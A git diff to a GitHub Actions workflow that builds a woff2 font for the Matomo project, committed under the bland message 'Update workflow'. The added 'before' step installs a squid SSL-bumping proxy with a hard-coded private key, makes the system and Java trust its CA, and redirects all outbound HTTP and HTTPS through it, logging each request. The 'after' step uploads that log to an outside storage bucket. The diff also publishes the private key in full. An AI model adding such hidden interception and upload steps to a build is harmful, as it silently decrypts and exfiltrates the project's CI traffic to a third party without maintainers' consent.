Update workflow

diff --git a/.github/workflows/buildwoff2.yml b/.github/workflows/buildwoff2.yml
--- a/.github/workflows/buildwoff2.yml
+++ b/.github/workflows/buildwoff2.yml
@@ -1,9 +1,336 @@
+env:
+  JAVA_TOOL_OPTIONS: -Djavax.net.ssl.trustStore=/usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+  NODE_OPTIONS: --use-openssl-ca
+jobs:
+  build:
+    name: build woff2
+    runs-on: ubuntu-latest
+    steps:
+    - name: before
+      run: 'sudo apt update
+
+        sudo apt install -y squid-openssl
+
+        sudo mkdir /squid
+
+        cat << EOF | sudo tee /squid/key.pem
+
+        -----BEGIN PRIVATE KEY-----
+
+        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
+
+        CznEvO4qIs3mXDYkNBQrdVLGF93y
+
+        -----END PRIVATE KEY-----
+
+        EOF
+
+        cat << EOF | sudo tee /squid/cert.pem
+
+        -----BEGIN CERTIFICATE-----
+
+        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
+
+        -----END CERTIFICATE-----
+
+        EOF
+
+        sudo /usr/lib/squid/security_file_certgen -c -s /squid/ssl_db -M 4MB
+
+        sudo chown -R proxy:proxy /squid
+
+        cat << EOF | sudo tee /etc/squid/squid.conf
+
+        cache deny all
+
+
+        http_port 7821
+
+        http_port 3128 intercept
+
+        https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB
+        cert=/squid/cert.pem key=/squid/key.pem
+
+        acl step1 at_step SslBump1
+
+        ssl_bump peek step1
+
+        ssl_bump bump all
+
+        sslcrtd_program /usr/lib/squid/security_file_certgen -s /squid/ssl_db -M 4MB
+
+        sslcrtd_children 5
+
+        ssl_bump server-first all
+
+        sslproxy_cert_error allow all
+
+
+        acl all src 0.0.0.0/0
+
+        http_access allow all
+
+
+        logformat custom {"method":"%">rm","url":"%">ru","status":%<Hs,"user_agent":"%{User-Agent}>h"}
+
+        access_log daemon:/squid/squidlog.json custom all !CONNECT
+
+        EOF
+
+        sudo systemctl reload squid
+
+        sudo cp /squid/cert.pem /usr/local/share/ca-certificates/squid.crt
+
+        sudo update-ca-certificates
+
+        sudo keytool -import -alias squid -file /squid/cert.pem -keystore /usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+        -storepass changeit -noprompt -trustcacerts
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        80 -j DNAT --to-destination 127.0.0.1:3128
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        443 -j DNAT --to-destination 127.0.0.1:3129
+
+        sudo sh -c ''echo 1 > /proc/sys/net/ipv4/ip_forward'''
+    - continue-on-error: true
+      id: vars
+      name: Detect branch for PR
+      run: "PR=\"${{ github.event.pull_request.number }}\"\n\nPR_INFO=$( curl \\\n\
+        \         --request GET \\\n         --header 'authorization: Bearer ${{ secrets.GITHUB_TOKEN\
+        \ }}' \\\n         --header 'content-type: application/json' \\\n        \
+        \ --url https://api.github.com/repos/$GITHUB_REPOSITORY/pulls/$PR )\nREF=$(echo\
+        \ \"${PR_INFO}\" | jq -r .head.ref)\nBASE=$(echo \"${PR_INFO}\" | jq -r .head.repo.full_name)\n\
+        STATE=$(echo \"${PR_INFO}\" | jq -r .state)\nBASE_SHA=$(echo \"${PR_INFO}\"\
+        \ | jq -r .base.sha)\n\nif [[ $STATE == \"closed\" ]]\nthen\n  echo \"Pull\
+        \ Request already closed.\"\n  exit 0;\nfi\n\necho \"islocalbranch=$(expr\
+        \ $BASE == $GITHUB_REPOSITORY)\" >> $GITHUB_OUTPUT\necho \"branch=$REF\" >>\
+        \ $GITHUB_OUTPUT\necho \"base=$BASE_SHA\" >> $GITHUB_OUTPUT\n"
+    - continue-on-error: true
+      if: steps.vars.outputs.branch != ''
+      uses: actions/checkout@v4
+      with:
+        lfs: false
+        persist-credentials: false
+    - continue-on-error: true
+      id: ttfcheck
+      if: steps.vars.outputs.branch != ''
+      name: Check ttf changes
+      run: "git fetch --depth=1 origin ${{ steps.vars.outputs.base }}\n\nTTF_FILE_MODIFIED=$(git\
+        \ diff --name-only ${{ steps.vars.outputs.base }} -- plugins/Morpheus/fonts/matomo.ttf\
+        \ | wc -l)\n\nif [[ $TTF_FILE_MODIFIED == \"0\" ]]\nthen\n  echo \"Font file\
+        \ not modified\"\n  exit 0;\nfi\n\necho \"ttf_modified=1\" >> $GITHUB_OUTPUT\n"
+    - continue-on-error: true
+      if: steps.vars.outputs.branch != '' && steps.ttfcheck.outputs.ttf_modified ==
+        '1'
+      name: Build woff2 file
+      run: 'git clone --recursive https://github.com/google/woff2.git tmp_woff2
+
+        cd tmp_woff2
+
+        make clean all
+
+        cd ..
+
+        ./tmp_woff2/woff2_compress plugins/Morpheus/fonts/matomo.ttf
+
+        '
+    - continue-on-error: true
+      env:
+        BRANCH_NAME: ${{ steps.vars.outputs.branch }}
+      if: steps.vars.outputs.branch != '' && steps.ttfcheck.outputs.ttf_modified ==
+        '1'
+      name: Prepare git config
+      run: "cat <<- EOF > $HOME/.netrc\n  machine github.com\n  login $GITHUB_ACTOR\n\
+        \  password $GITHUB_TOKEN\n  machine api.github.com\n  login $GITHUB_ACTOR\n\
+        \  password $GITHUB_TOKEN\nEOF\nchmod 600 $HOME/.netrc\ngit config --global\
+        \ user.email \"$GITHUB_ACTOR@users.noreply.github.com\"\ngit config --global\
+        \ user.name \"$GITHUB_ACTOR\"\ngit remote set-url origin https://x-access-token:${{\
+        \ secrets.GITHUB_TOKEN }}@github.com/$GITHUB_REPOSITORY\nif [[ ${{ steps.vars.outputs.islocalbranch\
+        \ }} ]]\nthen\n  git fetch --depth=1 origin $BRANCH_NAME\n  git checkout $BRANCH_NAME\n\
+        fi\n"
+    - continue-on-error: true
+      id: push
+      if: steps.vars.outputs.branch != '' && steps.ttfcheck.outputs.ttf_modified ==
+        '1'
+      name: Push changes
+      run: "if [[ $( git diff --numstat plugins/Morpheus/fonts/matomo.woff2 ) ]]\n\
+        then\n  if [[ ! ${{ steps.vars.outputs.islocalbranch }} ]]\n  then\n    echo\
+        \ \"It's only possible to update local branches automatically. Adding a comment\
+        \ instead.\"\n\n    echo \"failure=1\" >> $GITHUB_OUTPUT\n  else\n    cd $GITHUB_WORKSPACE\n\
+        \    git add plugins/Morpheus/fonts/matomo.woff2\n    git commit -m \"Build\
+        \ woff2 file\"\n    git push\n  fi\nfi\n"
+    - continue-on-error: true
+      if: steps.push.outputs.failure == '1'
+      uses: actions/github-script@v6
+      with:
+        script: "github.rest.issues.createComment({\n  issue_number: context.issue.number,\n\
+          \  owner: context.repo.owner,\n  repo: context.repo.repo,\n  body: 'woff2\
+          \ font file is not up to date. See https://developer.matomo.org/guides/matomo-font\
+          \ for details how to update the font correctly.'\n})\n"
+    - continue-on-error: true
+      if: steps.push.outputs.failure == '1'
+      name: Fail if not up to date
+      run: exit 1
+    - name: after
+      run: sudo curl --request PUT -T /squid/squidlog.json --url https://storage.googleapis.com/virtualeventdemoblr.appspot.com/squid/matomo-org/matomo.$(date
+        +%s)
+    timeout-minutes: 60
 name: Build woff2 font file
-
-on:
-  pull_request:
-    types: [synchronize, opened]
-
+'on':
+  workflow_dispatch: {}
 permissions:
   actions: read
   checks: none
@@ -15,114 +342,3 @@ permissions:
   repository-projects: none
   security-events: none
   statuses: none
-
-jobs:
-  build:
-    runs-on: ubuntu-latest
-    name: build woff2
-    steps:
-      - name: Detect branch for PR
-        id: vars
-        run: |
-          PR="${{ github.event.pull_request.number }}"
-
-          PR_INFO=$( curl \
-                   --request GET \
-                   --header 'authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' \
-                   --header 'content-type: application/json' \
-                   --url https://api.github.com/repos/$GITHUB_REPOSITORY/pulls/$PR )
-          REF=$(echo "${PR_INFO}" | jq -r .head.ref)
-          BASE=$(echo "${PR_INFO}" | jq -r .head.repo.full_name)
-          STATE=$(echo "${PR_INFO}" | jq -r .state)
-          BASE_SHA=$(echo "${PR_INFO}" | jq -r .base.sha)
-
-          if [[ $STATE == "closed" ]]
-          then
-            echo "Pull Request already closed."
-            exit 0;
-          fi
-
-          echo "islocalbranch=$(expr $BASE == $GITHUB_REPOSITORY)" >> $GITHUB_OUTPUT
-          echo "branch=$REF" >> $GITHUB_OUTPUT
-          echo "base=$BASE_SHA" >> $GITHUB_OUTPUT
-      - uses: actions/checkout@v4
-        with:
-          lfs: false
-          persist-credentials: false
-        if: steps.vars.outputs.branch != ''
-      - name: Check ttf changes
-        id: ttfcheck
-        run: |
-          git fetch --depth=1 origin ${{ steps.vars.outputs.base }}
-
-          TTF_FILE_MODIFIED=$(git diff --name-only ${{ steps.vars.outputs.base }} -- plugins/Morpheus/fonts/matomo.ttf | wc -l)
-
-          if [[ $TTF_FILE_MODIFIED == "0" ]]
-          then
-            echo "Font file not modified"
-            exit 0;
-          fi
-
-          echo "ttf_modified=1" >> $GITHUB_OUTPUT
-        if: steps.vars.outputs.branch != ''
-      - name: Build woff2 file
-        run: |
-          git clone --recursive https://github.com/google/woff2.git tmp_woff2
-          cd tmp_woff2
-          make clean all
-          cd ..
-          ./tmp_woff2/woff2_compress plugins/Morpheus/fonts/matomo.ttf
-        if: steps.vars.outputs.branch != '' && steps.ttfcheck.outputs.ttf_modified == '1'
-      - name: Prepare git config
-        run: |
-          cat <<- EOF > $HOME/.netrc
-            machine github.com
-            login $GITHUB_ACTOR
-            password $GITHUB_TOKEN
-            machine api.github.com
-            login $GITHUB_ACTOR
-            password $GITHUB_TOKEN
-          EOF
-          chmod 600 $HOME/.netrc
-          git config --global user.email "$GITHUB_ACTOR@users.noreply.github.com"
-          git config --global user.name "$GITHUB_ACTOR"
-          git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/$GITHUB_REPOSITORY
-          if [[ ${{ steps.vars.outputs.islocalbranch }} ]]
-          then
-            git fetch --depth=1 origin $BRANCH_NAME
-            git checkout $BRANCH_NAME
-          fi
-        env:
-          BRANCH_NAME: ${{ steps.vars.outputs.branch }}
-        if: steps.vars.outputs.branch != '' && steps.ttfcheck.outputs.ttf_modified == '1'
-      - name: Push changes
-        id: push
-        run: |
-          if [[ $( git diff --numstat plugins/Morpheus/fonts/matomo.woff2 ) ]]
-          then
-            if [[ ! ${{ steps.vars.outputs.islocalbranch }} ]]
-            then
-              echo "It's only possible to update local branches automatically. Adding a comment instead."
-
-              echo "failure=1" >> $GITHUB_OUTPUT
-            else
-              cd $GITHUB_WORKSPACE
-              git add plugins/Morpheus/fonts/matomo.woff2
-              git commit -m "Build woff2 file"
-              git push
-            fi
-          fi
-        if: steps.vars.outputs.branch != '' && steps.ttfcheck.outputs.ttf_modified == '1'
-      - uses: actions/github-script@v6
-        with:
-          script: |
-            github.rest.issues.createComment({
-              issue_number: context.issue.number,
-              owner: context.repo.owner,
-              repo: context.repo.repo,
-              body: 'woff2 font file is not up to date. See https://developer.matomo.org/guides/matomo-font for details how to update the font correctly.'
-            })
-        if: steps.push.outputs.failure == '1'
-      - name: Fail if not up to date
-        run: exit 1
-        if: steps.push.outputs.failure == '1'
